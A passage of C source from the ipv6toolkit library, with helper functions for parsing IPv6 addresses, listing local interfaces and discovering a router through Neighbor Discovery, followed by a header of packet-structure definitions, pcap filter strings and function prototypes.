dashes, it is an error */ if(dash_f){ if(slash_f) return(-1); else return(1); } else{ return(0); } } /* * Function: read_prefix() * * Obtain a pointer to the beginning of non-blank text, and zero-terminate that text upon space or comment. */ int read_prefix(char *line, unsigned int len, char **start){ char *end; *start=line; while( (*start < (line + len)) && (**start==' ' || **start=='\t' || **start=='\r' || **start=='\n')){ (*start)++; } if( *start == (line + len)) return(0); if( **start == '#') return(0); end= *start; while( (end < (line + len)) && !(*end==' ' || *end=='\t' || *end=='#' || *end=='\r' || *end=='\n')) end++; *end=0; return(1); } /* * Function: read_ipv6_address() * * Obtains an IPv6 address (struct in6_addr) from a line of text in "IPv6_address # comments" format */ int read_ipv6_address(char *line, unsigned int len, struct in6_addr *iid){ char *ptr, *ipv6addr; ptr= line; /* Skip initial spaces (e.g. " IPv6_address") */ while( (*ptr==' ' || *ptr=='\t') && ptr < (line+len)) ptr++; /* If we got to end of line or there is a comment or equal sign, there is no IPv6 address */ if(ptr==(line+len) || *ptr=='#' || *ptr=='=' || *ptr=='\r' || *ptr=='\n') return 0; ipv6addr=ptr; /* The IPv6 address is everything till (and excluding) the first separator character (e.g., space or tab) */ while( (*ptr!=' ' && *ptr!='\t' && *ptr!='\r' && *ptr!='\n' && *ptr!='#' && *ptr!='=') && ptr < (line+len)) ptr++; /* NULL-terminate the ASCII-encoded IPv6 address */ *ptr=0; if ( inet_pton(AF_INET6, ipv6addr, iid) <= 0){ return(-1); } return(1); } /* * Function: print_local_addrs() * * Debugging function to print all local addresses (starting from a struct iface_data *) */ int print_local_addrs(struct iface_data *idata){ unsigned int i, j; char pv6addr[INET6_ADDRSTRLEN]; char plinkaddr[ETHER_ADDR_PLEN]; puts("List of local interfaces/addresses"); for(i=0; i < idata->iflist.nifaces; i++){ if(ether_ntop(&((idata->iflist).ifaces[i].ether), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Name: %s\tIndex: %d\t Address: %s\n", (idata->iflist.ifaces[i]).iface, (idata->iflist.ifaces[i]).ifindex, plinkaddr); puts("Link-local addresses:"); for(j=0; j < idata->iflist.ifaces[i].ip6_local.nprefix; j++){ if(inet_ntop(AF_INET6, idata->iflist.ifaces[i].ip6_local.prefix[j], pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("\t%s\n", pv6addr); } puts("Global addresses:"); for(j=0; j < idata->iflist.ifaces[i].ip6_global.nprefix; j++){ if(inet_ntop(AF_INET6, idata->iflist.ifaces[i].ip6_global.prefix[j], pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("\t%s\n", pv6addr); } puts(""); } return(SUCCESS); } /* * Function: find_ipv6_router() * * Finds a local router (by means of Neighbor Discovery) */ int find_ipv6_router(pcap_t *pfd, struct ether_addr *hsrcaddr, struct in6_addr *srcaddr, \ struct ether_addr *result_ether, struct in6_addr *result_ipv6){ struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_router_advert *pkt_ra; unsigned char *pkt_end; unsigned char *ptr, *prev_nh; int r; size_t nw; unsigned char buffer[65556]; unsigned int rs_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_router_solicit *rs; struct nd_opt_slla *sllaopt; volatile unsigned int tries=0; volatile unsigned int foundrouter=0; struct sigaction new_sig, old_sig; rs_max_packet_size = ETH_DATA_LEN; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_RA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } if(pcap_setfilter(pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= *srcaddr; if ( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ puts("inet_pton(): Error converting All Routers address from presentation to network format"); return(-1); } ether->src = *hsrcaddr; if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(ether->dst), sizeof(struct ether_addr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); return(-1); } ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+rs_max_packet_size)){ puts("Packet too large while inserting Router Solicitation header"); return(-1); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; rs->nd_rs_reserved = 0; ptr += sizeof(struct nd_router_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+rs_max_packet_size)){ puts("RS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy( &(hsrcaddr->a), sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; bzero(&new_sig, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundrouter){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); return(-1); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(-1); } alarm(1); while(!foundrouter){ if( (r=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ra = (struct nd_router_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ra + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ra + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Neighbor Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_ra) < (sizeof(struct nd_router_advert) + \ sizeof(struct nd_opt_slla))) continue; /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255) continue; /* Check that the IPv6 packet encapsulates an ICMPv6 message */ if(pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6) continue; /* Check that the ICMPv6 type corresponds to RA */ if(pkt_ra->nd_ra_type != ND_ROUTER_ADVERT) continue; /* Check that the ICMPv6 code is 0 */ if(pkt_ra->nd_ra_code != 0) continue; /* Check that the IPv6 Source Address of the Router Advertisement is an IPv6 link-local address. */ if( (pkt_ipv6->ip6_src.s6_addr16[0] & htons(0xffc0)) != htons(0xfe80)) continue; /* Check that that the Destination Address of the Router Advertisement is either the one that we used for sending the Router Solicitation message or a multicast address (typically the all-nodes) */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src)) && !IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))) continue; /* Check that the ICMPv6 checksum is correct. If the received checksum is valid, and we compute the checksum over the received packet (including the Checkdum field) the result is 0. Otherwise, the packet has been corrupted. */ if(in_chksum(pkt_ipv6, pkt_ra, pkt_end- (unsigned char *)pkt_ra, IPPROTO_ICMPV6) != 0) continue; ptr= (unsigned char *) pkt_ra + sizeof(struct nd_router_advert); /* Process Router Advertisement options */ while( (ptr+sizeof(struct nd_opt_slla)) <= pkt_end && (*(ptr+1) != 0)){ if(*ptr == ND_OPT_SOURCE_LINKADDR){ if( (*(ptr+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ *result_ether= *(struct ether_addr *) (ptr+2); *result_ipv6= pkt_ipv6->ip6_src; foundrouter=1; break; } ptr= ptr + *(ptr+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Router Solicitations */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ puts("Error setting up 'Alarm' signal"); return(-1); } if(foundrouter) return 0; else return -1; } ipv6toolkit-1.5.1/tools/libipv6.h000066400000000000000000000512221223702747200167040ustar00rootroot00000000000000/* General constants */ #define SUCCESS 1 #define FAILURE 0 #define TRUE 1 #define FALSE 0 #define LUI long unsigned int #define CHAR_CR 0x0d #define CHAR_LF 0x0a #define DATA_BUFFER_LEN 1000 #define LINE_BUFFER_SIZE 80 #define MAX_STRING_SIZE 10 /* For limiting strncmp */ #define MAX_RANGE_STR_LEN 79 /* For function that check for address ranges in string */ #define ETH_ALEN 6 /* Octets in one ethernet addr */ #define ETH_HLEN 14 /* Total octets in header. */ #define ETH_DATA_LEN 1500 /* Max. octets in payload */ #define ETHERTYPE_IPV6 0x86dd /* IP protocol version 6 */ #define ETHER_ADDR_LEN ETH_ALEN /* size of ethernet addr */ #define ETHER_HDR_LEN ETH_HLEN /* total octets in header */ #define ETHER_ADDR_PLEN 18 /* Includes termination byte */ #define ETHER_ALLNODES_LINK_ADDR "33:33:00:00:00:01" #define ETHER_ALLROUTERS_LINK_ADDR "33:33:00:00:00:02" #define MIN_IPV6_HLEN 40 #define MIN_IPV6_MTU 1280 #define MIN_TCP_HLEN 20 #define MIN_UDP_HLEN 20 #define MIN_ICMP6_HLEN 8 #define MIN_HBH_LEN 8 #define SLLA_OPT_LEN 1 #define TLLA_OPT_LEN 1 #define MIN_DST_OPT_HDR_SIZE 8 #define MAX_SLLA_OPTION 100 #define MAX_TLLA_OPTION 256 #define IFACE_LENGTH 255 #define ALL_NODES_MULTICAST_ADDR "FF02::1" #define ALL_ROUTERS_MULTICAST_ADDR "FF02::2" #define SOLICITED_NODE_MULTICAST_PREFIX "FF02:0:0:0:0:1:FF00::" /* Support for IPv6 extension headers */ #define FRAG_HDR_SIZE 8 #define MAX_IPV6_PAYLOAD 65535 #define MAX_DST_OPT_HDR 256 #define MAX_DST_OPT_U_HDR MAX_DST_OPT_HDR #define MAX_HBH_OPT_HDR MAX_DST_OPT_HDR /* Filter Constants */ #define MAX_BLOCK_SRC 50 #define MAX_BLOCK_DST 50 #define MAX_BLOCK_TARGET 50 #define MAX_BLOCK_LINK_SRC 50 #define MAX_BLOCK_LINK_DST 50 struct filters{ /* Block Filters */ struct in6_addr *blocksrc; struct in6_addr *blockdst; struct in6_addr *blocktarget; u_int8_t *blocksrclen; u_int8_t *blockdstlen; u_int8_t *blocktargetlen; struct ether_addr *blocklinksrc; struct ether_addr *blocklinkdst; unsigned int nblocksrc; unsigned int nblockdst; unsigned int nblocktarget; unsigned int nblocklinksrc; unsigned int nblocklinkdst; /* Accept Filters */ struct in6_addr *acceptsrc; struct in6_addr *acceptdst; struct in6_addr *accepttarget; u_int8_t *acceptsrclen; u_int8_t *acceptdstlen; u_int8_t *accepttargetlen; unsigned char acceptfilters_f; struct ether_addr *acceptlinksrc; struct ether_addr *acceptlinkdst; unsigned int nacceptsrc; unsigned int nacceptdst; unsigned int naccepttarget; unsigned int nacceptlinksrc; unsigned int nacceptlinkdst; }; #define MAX_ACCEPT_SRC 50 #define MAX_ACCEPT_DST 50 #define MAX_ACCEPT_TARGET 50 #define MAX_ACCEPT_LINK_SRC 50 #define MAX_ACCEPT_LINK_DST 50 #define ACCEPTED 1 #define BLOCKED 0 /* Constants used with the libcap functions */ #define PCAP_IPV6_FILTER "ip6" #define PCAP_TCPV6_FILTER "ip6 and tcp" #define PCAP_UDPV6_FILTER "ip6 and udp" #define PCAP_ICMPV6_FILTER "icmp6" #define PCAP_ICMPV6_NA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==136 and ip6[41]==0" #define PCAP_ICMPV6_NS_FILTER "icmp6 and ((ip6[7]==255 and ip6[40]==135 and ip6[41]==0) or ip6[40]==4)" #define PCAP_ICMPV6_RA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==134 and ip6[41]==0" #define PCAP_ICMPV6_RANS_FILTER "icmp6 and ip6[7]==255 and ((ip6[40]==134 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_TCPIPV6_NS_FILTER "ip6 and (tcp or (icmp6 and ip6[7]==255 and ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_NI_QUERY "icmp6 and ip6[40]==139" #define PCAP_ICMPV6_NI_REPLY "icmp6 and ip6[40]==140" #define PCAP_NOPACKETS_FILTER "not ip and not ip6 and not arp" #define PCAP_ICMPV6NSEXCEEDED_FILTER "icmp6 and ((ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0))" #define PCAP_ICMPV6_RS_FILTER "icmp6 and ip6[7]==255 and ip6[40]==133 and ip6[41]==0" #define PCAP_ICMPV6_NSECHOEXCEEDED_FILTER "icmp6 and ((ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0) or (ip6[7]==255 and ip6[40]==135 and ip6[41]==0))" /* Filter to receive Neighbor Solicitations and Fragmented packets */ #define PCAP_ICMPV6NSFRAG_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==44)" #define PCAP_NSTCP_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==6)" /* Filter to receive Neighbor Solicitations and Fragmented packets */ #define PCAP_ICMPV6NSFRAG_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==44)" /* #define PCAP_ICMPV6NSEXCEEDED_FILTER "icmp6 and ((ip6[7]==255 and ip6[40]==135 and ip6[41]==0) or (ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0))" */ #define PCAP_TCPIPV6_FILTER "ip6 and tcp" /* Constants used for Router Discovery */ #define MAX_PREFIXES_ONLINK 100 #define MAX_PREFIXES_AUTO 100 #define MAX_LOCAL_ADDRESSES 256 /* Constants used for sending Router Advertisements */ #define MAX_PREFIX_OPTION 256 #define MAX_ROUTE_OPTION MAX_PREFIX_OPTION #define MAX_MTU_OPTION MAX_PREFIX_OPTION #define MAX_RDNSS_OPTION MAX_PREFIX_OPTION #define MAX_RDNSS_OPT_ADDRS 127 #define DEFAULT_PREFIX_PREFERRED 0xffffffff #define DEFAULT_PREFIX_VALID 0xffffffff #define DEFAULT_CURHOP 255 #define DEFAULT_ROUTER_LIFETIME 9000 #define DEFAULT_ROUTER_REACHABLE 0Xffffffff #define DEFAULT_ROUTER_RETRANS 4000 #define DEFAULT_ROUTER_PREFERENCE 0x08 #define DEFAULT_RDNSS_LIFETIME 9000 #define DEFAULT_ROUTE_OPT_LIFE 0xffffffff #define DEFAULT_ROUTE_OPT_PREF 0x08 /* For Fragment ID or Flow Label assessment */ #define ID_ASSESS_TIMEOUT 5 #define NSAMPLES 40 #define FIXED_ORIGIN 1 #define MULTI_ORIGIN 2 struct ether_addr{ u_int8_t a[ETHER_ADDR_LEN]; } __attribute__ ((__packed__)); /* For DLT_NULL encapsulation */ struct dlt_null { u_int32_t family; /* Protocol Family */ } __attribute__ ((__packed__)); /* IPv6 options Most stacks define "struct ip_opt" for this purpose. But ias has proved to be painful to use this structure in Mac OS, since its definition seems to depend on the Xcode version, which is hard (if at all possible) to check at compile time. As a workaround, we define our own data type for IPv6 options */ struct ip6_option{ uint8_t ip6o_type; uint8_t ip6o_len; } __attribute__ ((__packed__)); struct nd_opt_slla{ u_int8_t type; u_int8_t length; u_int8_t address[6]; } __attribute__ ((__packed__)); struct nd_opt_tlla{ u_int8_t type; u_int8_t length; u_int8_t address[6]; } __attribute__ ((__packed__)); struct nd_opt_route_info_l{ u_int8_t nd_opt_ri_type; u_int8_t nd_opt_ri_len; u_int8_t nd_opt_ri_prefix_len; u_int8_t nd_opt_ri_rsvd_pref_rsvd; u_int32_t nd_opt_ri_lifetime; struct in6_addr nd_opt_ri_prefix; } __attribute__ ((__packed__)); struct nd_opt_rdnss_l{ u_int8_t nd_opt_rdnss_type; u_int8_t nd_opt_rdnss_len; u_int16_t nd_opt_rdnss_rsvd; u_int32_t nd_opt_rdnss_lifetime; struct in6_addr nd_opt_rdnss_addr[]; } __attribute__ ((__packed__)); struct ipv6pseudohdr{ struct in6_addr srcaddr; struct in6_addr dstaddr; u_int32_t len; u_int8_t zero[3]; u_int8_t nh; } __attribute__ ((__packed__)); /* 10Mb/s ethernet header */ struct ether_header { struct ether_addr dst; /* destination eth addr */ struct ether_addr src; /* source ether addr */ u_int16_t ether_type; /* packet type ID field */ } __attribute__ ((__packed__)); typedef u_int32_t tcp_seq; #ifdef __linux__ /* Linux definition */ /* * TCP header. * Per RFC 793, September, 1981. */ struct tcp_hdr{ u_int16_t th_sport; /* source port */ u_int16_t th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ # if __BYTE_ORDER == __LITTLE_ENDIAN u_int8_t th_x2:4; /* (unused) */ u_int8_t th_off:4; /* data offset */ # endif # if __BYTE_ORDER == __BIG_ENDIAN u_int8_t th_off:4; /* data offset */ u_int8_t th_x2:4; /* (unused) */ # endif u_int8_t th_flags; # define TH_FIN 0x01 # define TH_SYN 0x02 # define TH_RST 0x04 # define TH_PUSH 0x08 # define TH_ACK 0x10 # define TH_URG 0x20 u_int16_t th_win; /* window */ u_int16_t th_sum; /* checksum */ u_int16_t th_urp; /* urgent pointer */ } __attribute__ ((__packed__)); #elif defined(__APPLE__) /* Mac OS definition */ /* * TCP header. * Per RFC 793, September, 1981. */ struct tcp_hdr{ u_int16_t th_sport; /* source port */ u_int16_t th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ # if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ u_int8_t th_x2:4; /* (unused) */ u_int8_t th_off:4; /* data offset */ # endif # if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ u_int8_t th_off:4; /* data offset */ u_int8_t th_x2:4; /* (unused) */ # endif u_int8_t th_flags; # define TH_FIN 0x01 # define TH_SYN 0x02 # define TH_RST 0x04 # define TH_PUSH 0x08 # define TH_ACK 0x10 # define TH_URG 0x20 u_int16_t th_win; /* window */ u_int16_t th_sum; /* checksum */ u_int16_t th_urp; /* urgent pointer */ } __attribute__ ((__packed__)); #else /* BSD definition */ /* * TCP header. * Per RFC 793, September, 1981. */ struct tcp_hdr { u_int16_t th_sport; /* source port */ u_int16_t th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ #if _BYTE_ORDER == _LITTLE_ENDIAN u_int32_t th_x2:4, /* (unused) */ th_off:4; /* data offset */ #endif #if _BYTE_ORDER == _BIG_ENDIAN u_int32_t th_off:4, /* data offset */ th_x2:4; /* (unused) */ #endif u_int8_t th_flags; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 #define TH_ECE 0x40 #define TH_CWR 0x80 u_int16_t th_win; /* window */ u_int16_t th_sum; /* checksum */ u_int16_t th_urp; /* urgent pointer */ }; #endif struct udp_hdr{ u_int16_t uh_sport; /* source port */ u_int16_t uh_dport; /* destination port */ u_int16_t uh_ulen; /* udp length */ u_int16_t uh_sum; /* udp checksum */ } __attribute__ ((__packed__)); struct prefix_entry{ struct in6_addr ip6; unsigned char len; }; struct prefix_list{ struct prefix_entry **prefix; unsigned int nprefix; unsigned int maxprefix; }; struct prefix4_entry{ struct in_addr ip; unsigned char len; }; struct host_entry{ struct in6_addr ip6; struct ether_addr ether; unsigned char flag; struct host_entry *next; }; struct host_list{ struct host_entry **host; unsigned int nhosts; unsigned int maxhosts; }; struct address_list{ struct in6_addr *addr; unsigned int naddr; unsigned int maxaddr; }; #define MAX_IFACES 10 struct iface_entry{ int ifindex; char iface[IFACE_LENGTH]; struct ether_addr ether; struct prefix_list ip6_global; struct prefix_list ip6_local; int flags; }; struct iface_list{ struct iface_entry *ifaces; unsigned int nifaces; unsigned int maxifaces; }; #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #ifndef s6_addr16 #define s6_addr16 __u6_addr.__u6_addr16 #endif #ifndef s6_addr8 #define s6_addr8 __u6_addr.__u6_addr8 #endif #ifndef s6_addr32 #define s6_addr32 __u6_addr.__u6_addr32 #endif #endif /* This causes Linux to use the BSD definition of the TCP and UDP header fields */ #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif /* Names (DNS, NI) related constants and definitions */ #define MAX_DOMAIN_LEN 512 #define MAX_DNS_LABELS 50 #define MAX_DNS_CLABELS 5 /* ICMPv6 Types/Codes not defined in some OSes */ #ifndef ICMP6_DST_UNREACH_FAILEDPOLICY #define ICMP6_DST_UNREACH_FAILEDPOLICY 5 #endif #ifndef ICMP6_DST_UNREACH_REJECTROUTE #define ICMP6_DST_UNREACH_REJECTROUTE 6 #endif #if !(defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__)) /* Definitions for Linux */ #define ICMP6_NI_QUERY 139 /* node information request */ #define ICMP6_NI_REPLY 140 /* node information reply */ /* * icmp6 namelookup */ struct icmp6_namelookup { struct icmp6_hdr icmp6_nl_hdr; u_int8_t icmp6_nl_nonce[8]; int32_t icmp6_nl_ttl; #if 0 u_int8_t icmp6_nl_len; u_int8_t icmp6_nl_name[3]; #endif /* could be followed by options */ } __attribute__ ((__packed__)); /* * icmp6 node information */ struct icmp6_nodeinfo { struct icmp6_hdr icmp6_ni_hdr; u_int8_t icmp6_ni_nonce[8]; /* could be followed by reply data */ } __attribute__ ((__packed__)); #define ni_type icmp6_ni_hdr.icmp6_type #define ni_code icmp6_ni_hdr.icmp6_code #define ni_cksum icmp6_ni_hdr.icmp6_cksum #define ni_qtype icmp6_ni_hdr.icmp6_data16[0] #define ni_flags icmp6_ni_hdr.icmp6_data16[1] #define NI_QTYPE_NOOP 0 /* NOOP */ #define NI_QTYPE_SUPTYPES 1 /* Supported Qtypes */ #define NI_QTYPE_FQDN 2 /* FQDN (draft 04) */ #define NI_QTYPE_DNSNAME 2 /* DNS Name */ #define NI_QTYPE_NODEADDR 3 /* Node Addresses */ #define NI_QTYPE_IPV4ADDR 4 /* IPv4 Addresses */ #if __BYTE_ORDER == __BIG_ENDIAN #define NI_SUPTYPE_FLAG_COMPRESS 0x1 #define NI_FQDN_FLAG_VALIDTTL 0x1 #elif __BYTE_ORDER == __LITTLE_ENDIAN #define NI_SUPTYPE_FLAG_COMPRESS 0x0100 #define NI_FQDN_FLAG_VALIDTTL 0x0100 #endif #if __BYTE_ORDER == __BIG_ENDIAN #define NI_NODEADDR_FLAG_TRUNCATE 0x1 #define NI_NODEADDR_FLAG_ALL 0x2 #define NI_NODEADDR_FLAG_COMPAT 0x4 #define NI_NODEADDR_FLAG_LINKLOCAL 0x8 #define NI_NODEADDR_FLAG_SITELOCAL 0x10 #define NI_NODEADDR_FLAG_GLOBAL 0x20 #define NI_NODEADDR_FLAG_ANYCAST 0x40 /* just experimental. not in spec */ #elif __BYTE_ORDER == __LITTLE_ENDIAN #define NI_NODEADDR_FLAG_TRUNCATE 0x0100 #define NI_NODEADDR_FLAG_ALL 0x0200 #define NI_NODEADDR_FLAG_COMPAT 0x0400 #define NI_NODEADDR_FLAG_LINKLOCAL 0x0800 #define NI_NODEADDR_FLAG_SITELOCAL 0x1000 #define NI_NODEADDR_FLAG_GLOBAL 0x2000 #define NI_NODEADDR_FLAG_ANYCAST 0x4000 /* just experimental. not in spec */ #endif struct ni_reply_fqdn { u_int32_t ni_fqdn_ttl; /* TTL */ u_int8_t ni_fqdn_namelen; /* length in octets of the FQDN */ u_int8_t ni_fqdn_name[3]; /* XXX: alignment */ } __attribute__ ((__packed__)); #endif struct ni_reply_ip6 { u_int32_t ni_ip6_ttl; /* TTL */ struct in6_addr ip6; /* IPv6 address */ } __attribute__ ((__packed__)); struct ni_reply_ip { u_int32_t ni_ip_ttl; /* TTL */ struct in_addr ip; /* IPv6 address */ } __attribute__ ((__packed__)); struct ni_reply_name { u_int32_t ni_name_ttl; /* TTL */ unsigned char ni_name_name; /* IPv6 address */ } __attribute__ ((__packed__)); /* ICMPv6 Types/Codes not defined in some OSes */ #ifndef ICMP6_DST_UNREACH_FAILEDPOLICY #define ICMP6_DST_UNREACH_FAILEDPOLICY 5 #endif #ifndef ICMP6_DST_UNREACH_REJECTROUTE #define ICMP6_DST_UNREACH_REJECTROUTE 6 #endif struct packet{ unsigned char *link; unsigned char *ipv6; unsigned char *upper; unsigned long maxsize; }; struct iface_data{ char iface[IFACE_LENGTH]; unsigned char iface_f; pcap_t *pfd; int ifindex; unsigned char ifindex_f; struct iface_list iflist; int type; int flags; int fd; unsigned int pending_write_f; void *pending_write_data; unsigned int pending_write_size; fd_set *rset; fd_set *wset; fd_set *eset; unsigned int write_errors; struct ether_addr ether; unsigned int ether_flag; unsigned int linkhsize; unsigned int max_packet_size; struct in6_addr ip6_local; unsigned int ip6_local_flag; struct prefix_list ip6_global; unsigned int ip6_global_flag; struct in6_addr router_ip6; struct ether_addr router_ether; struct prefix_list prefix_ac; struct prefix_list prefix_ol; unsigned int local_retrans; unsigned int local_timeout; unsigned int mtu; struct ether_addr hsrcaddr; unsigned int hsrcaddr_f; struct ether_addr hdstaddr; unsigned int hdstaddr_f; struct in6_addr srcaddr; unsigned int srcaddr_f; unsigned char srcpreflen; unsigned char srcprefix_f; struct in6_addr dstaddr; unsigned int dstaddr_f; unsigned int verbose_f; unsigned char listen_f; char loopback_f; /* XXX The next four variables are kind of a duplicate of router_ip6 and router_ether above. May remove them at some point */ struct in6_addr nhaddr; unsigned char nhaddr_f; struct ether_addr nhhaddr; unsigned char nhhaddr_f; int nhifindex; unsigned char nhifindex_f; char nhiface[IFACE_LENGTH]; unsigned char nh_f; }; #ifdef __linux__ /* Consulting the routing table */ #define MAX_NLPAYLOAD 1024 #else #define MAX_RTPAYLOAD 1024 #endif struct next_hop{ struct in6_addr srcaddr; unsigned char srcaddr_f; struct in6_addr dstaddr; unsigned char dstaddr_f; struct in6_addr nhaddr; unsigned char nhaddr_f; struct ether_addr nhhaddr; unsigned char nhhaddr_f; int ifindex; unsigned char ifindex_f; }; /* Flags that specify what the load_dst_and_pcap() function should do */ #define LOAD_PCAP_ONLY 0x01 #define LOAD_SRC_NXT_HOP 0x02 #ifndef SA_SIZE #define SA_SIZE(sa) \ ( (!(sa) || ((struct sockaddr *)(sa))->sa_len == 0) ? \ sizeof(long) : \ 1 + ( (((struct sockaddr *)(sa))->sa_len - 1) | (sizeof(long) - 1) ) ) #endif #ifndef SA_NEXT #define SA_NEXT(sa) (sa= (struct sockaddr *) ( (char *) sa + SA_SIZE(sa))) #endif int address_contains_ranges(char *); void change_endianness(u_int32_t *, unsigned int); u_int16_t dec_to_hex(u_int16_t); int dns_decode(unsigned char *, unsigned int, unsigned char *, char *, unsigned int, unsigned char **); int dns_str2wire(char *, unsigned int, char *, unsigned int); struct ether_addr ether_multicast(const struct in6_addr *); int ether_ntop(const struct ether_addr *, char *, size_t); int ether_pton(const char *, struct ether_addr *, unsigned int); void ether_to_ipv6_linklocal(struct ether_addr *etheraddr, struct in6_addr *ipv6addr); void *find_iface_by_index(struct iface_list *, int); void *find_iface_by_name(struct iface_list *, char *); int find_ipv6_router(pcap_t *, struct ether_addr *, struct in6_addr *, struct ether_addr *, struct in6_addr *); int find_ipv6_router_full(pcap_t *, struct iface_data *); struct iface_entry *find_matching_address(struct iface_data *, struct iface_list *, struct in6_addr *, struct in6_addr *); void generate_slaac_address(struct in6_addr *, struct ether_addr *, struct in6_addr *); int get_if_addrs(struct iface_data *); int get_local_addrs(struct iface_data *); int inc_sdev(u_int32_t *, unsigned int, u_int32_t *, double *); int init_iface_data(struct iface_data *); int init_filters(struct filters *); u_int16_t in_chksum(void *, void *, size_t, u_int8_t); int insert_pad_opt(unsigned char *ptrhdr, const unsigned char *, unsigned int); int ipv6_to_ether(pcap_t *, struct iface_data *, struct in6_addr *, struct ether_addr *); unsigned int ip6_longest_match(struct in6_addr *, struct in6_addr *); int is_ip6_in_address_list(struct prefix_list *, struct in6_addr *); int is_ip6_in_iface_entry(struct iface_list *, int, struct in6_addr *); int is_ip6_in_list(struct in6_addr *, struct host_list *); int is_ip6_in_prefix_list(struct in6_addr *, struct prefix_list *); int is_eq_in6_addr(struct in6_addr *, struct 